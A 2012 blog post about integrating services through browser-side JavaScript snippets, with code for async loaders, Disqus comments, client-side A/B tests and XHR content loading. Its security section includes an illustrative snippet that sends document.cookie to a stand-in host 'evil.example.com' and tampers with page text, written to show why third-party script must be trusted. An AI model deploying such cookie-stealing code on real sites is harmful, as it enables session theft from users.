
The Power of Static Web

By Ahti Kitsik, 29 Mar 2012

Recent web startups often share a common pitch for integration simplicity: "It only takes one line of JavaScript to integrate with our service!" Disqus, KISSmetrics, Chartbeat, Google Analytics, Facebook and G+ buttons. When was the last time you had to write SERVER-SIDE code to integrate a new service? That's gone. Let me share a few thoughts on where I think this trend takes us.
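
In practice the "one line" is usually a small async loader. A minimal sketch of the pattern, assuming a made-up vendor URL (this is not any particular service's actual snippet):

    <script>
      // Generic async-loader pattern used by most embeddable services:
      // inject a <script> tag that pulls the real widget code off a CDN.
      (function() {
        var s = document.createElement('script');
        s.async = true;
        s.src = '//cdn.example-widgets.com/widget.js'; // hypothetical URL
        document.getElementsByTagName('head')[0].appendChild(s);
      })();
    </script>

The async attribute keeps the third-party download from blocking your page render, which is why vendors converged on this shape.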

Static CDN serving for "dynamic" websites

Static pregenerated websites behind a CDN scale massively better than any PHP+MySQL CMS (WordPress, Drupal, Joomla).

This has boosted a number of static site generators like Jekyll. But why now? Why not before?

Because most sites had a dynamic element that couldn't be regenerated easily. Comments, mostly.

A few dynamically generated sites have become fully static thanks to the Disqus commenting system, which sits in the browser without any server-side integration. Getting the same level of integration on the server side would bring more complexity: it depends on frameworks, languages and version compatibility.
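
For the flavor of it, the Disqus embed is roughly the following (the shortname identifies your site; quoted from memory, so treat it as a sketch rather than the canonical snippet):

    <div id="disqus_thread"></div>
    <script>
      var disqus_shortname = 'yoursite'; // your site's Disqus shortname
      (function() {
        // Load Disqus asynchronously; it renders itself into #disqus_thread.
        var dsq = document.createElement('script');
        dsq.async = true;
        dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        (document.getElementsByTagName('head')[0] ||
         document.getElementsByTagName('body')[0]).appendChild(dsq);
      })();
    </script>

Nothing here touches your server: the comments live on Disqus's infrastructure and your pages stay static.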

It does not end with comments. There are "1-liner" shopping carts, chatrooms, customer feedback, customer support, visitor analytics, games. These either complement or integrate with your site, and more services are appearing rapidly. I hope to see more variety in this field: theming/styling websites dynamically, A/B testing, JavaScript-backed content caching, AWS SimpleDB-like storage for unified data-model integration. Turning upside down things that previously had to sit on the server side.
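
To show how little browser code some of these need, here is a naive A/B test done entirely client-side. The cookie name, CSS class and stats endpoint are all made up for illustration:

    <script>
      // Run near the end of <body> so document.body exists.
      // Pick a variant once per visitor and persist it in a cookie.
      var variant = /ab=b/.test(document.cookie) ? 'b' :
                    /ab=a/.test(document.cookie) ? 'a' :
                    (Math.random() < 0.5 ? 'a' : 'b');
      document.cookie = 'ab=' + variant + '; path=/';
      if (variant === 'b') {
        document.body.className += ' variant-b'; // stylesheet does the rest
      }
      // Report the variant via an image beacon (hypothetical endpoint).
      new Image().src = '//stats.example.com/hit?ab=' + variant;
    </script>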

One step further for the static CDN approach is JavaScript-fetched content. This is already happening: browser JavaScript is used to fetch content for the website. But there is a lingering problem. Until about a year ago, search engines did not run or index JavaScript-fetched content, so the search engines must catch up in order to provide the best search results. The good news is that Google and others are already doing that! They have started to run JavaScript with their V8-powered crawler. But it is by no means guaranteed that your JavaScript is neat enough for that crawler. In order to keep search relevant they must keep up and run more and more JavaScript for indexing. It's expensive, but to a certain degree we can expect JavaScript-enabled indexing crawlers to take over.
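
The pattern itself is simple: serve a static shell from the CDN and pull the content fragment in with XMLHttpRequest. A minimal sketch, with a placeholder fragment path:

    <div id="content">Loading...</div>
    <script>
      // Fetch a pregenerated HTML fragment and inject it into the shell.
      // '/fragments/article.html' is an illustrative path, not a real API.
      var xhr = new XMLHttpRequest();
      xhr.open('GET', '/fragments/article.html', true);
      xhr.onreadystatechange = function() {
        if (xhr.readyState === 4 && xhr.status === 200) {
          document.getElementById('content').innerHTML = xhr.responseText;
        }
      };
      xhr.send();
    </script>

This is exactly the content a non-JavaScript crawler never sees, which is why crawler-side JavaScript execution matters.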

Security

By keeping 3rd-party components outside of your server walls, your internal systems are better protected from being compromised.
On the other hand, this risk is passed on to the end user, who is exposed to any code the 3rd party chooses to run in her browser.
Thankfully browsers are relatively safe sandboxes, so this security threat is close to that of visiting any regular website. The main difference is that the JavaScript provider (the 3rd party) can potentially tamper with your webpage content and has access to your website's user info and page content. So you must trust any 3rd-party JavaScript component 100%. From a security perspective it seems favorable for the service provider to keep 3rd-party integration at the browser level.
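
To make that trust requirement concrete: an embedded script runs with the full privileges of your page. A compromised widget could do something like the following (the exfiltration URL is fictional):

    <script>
      // Anything you <script src="..."> into a page can read and rewrite it.
      var stolen = encodeURIComponent(document.cookie); // non-HttpOnly cookies
      new Image().src = '//evil.example.com/collect?c=' + stolen;
      var h = document.querySelector('h1');
      if (h) h.textContent = 'Tampered!'; // rewrite visible page content
    </script>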

Power of insight

The browser always sees more about your user than your server does, because it's closer to the user. Being closer is better.
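
A sketch of what "closer" buys you: signals the server never receives on its own, reported here to a hypothetical collection endpoint:

    <script>
      // Browser-only signals: viewport, physical screen, timezone offset.
      var signals = {
        viewport: window.innerWidth + 'x' + window.innerHeight,
        screen: screen.width + 'x' + screen.height,
        tzOffset: new Date().getTimezoneOffset()
      };
      // '//insight.example.com/i' is illustrative, not a real service.
      new Image().src = '//insight.example.com/i?d=' +
                        encodeURIComponent(JSON.stringify(signals));
    </script>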

Browser era MVC

With JavaScript doing the data loading and pushing, the widely used server-side Model-View-Controller (MVC) architecture falls apart. At least the server is no longer the Controller it used to be. The browser becomes the new Controller, and the server is just one of the Model providers.
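
A minimal sketch of that split, with illustrative URLs and element ids: the server is reduced to handing out JSON models, while browser code decides what to load and how to render it.

    <ul id="posts"></ul>
    <script>
      // Controller: decide what data to load and when.
      var xhr = new XMLHttpRequest();
      xhr.open('GET', '/api/posts.json', true); // server = one Model provider
      xhr.onreadystatechange = function() {
        if (xhr.readyState === 4 && xhr.status === 200) {
          render(JSON.parse(xhr.responseText));
        }
      };
      xhr.send();

      // View: turn the model into DOM.
      function render(posts) {
        var list = document.getElementById('posts');
        for (var i = 0; i < posts.length; i++) {
          var li = document.createElement('li');
          li.textContent = posts[i].title;
          list.appendChild(li);
        }
      }
    </script>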

What are the other, less covered upsides and downsides of moving more of the action to the browser?

@ahtik is on twitter!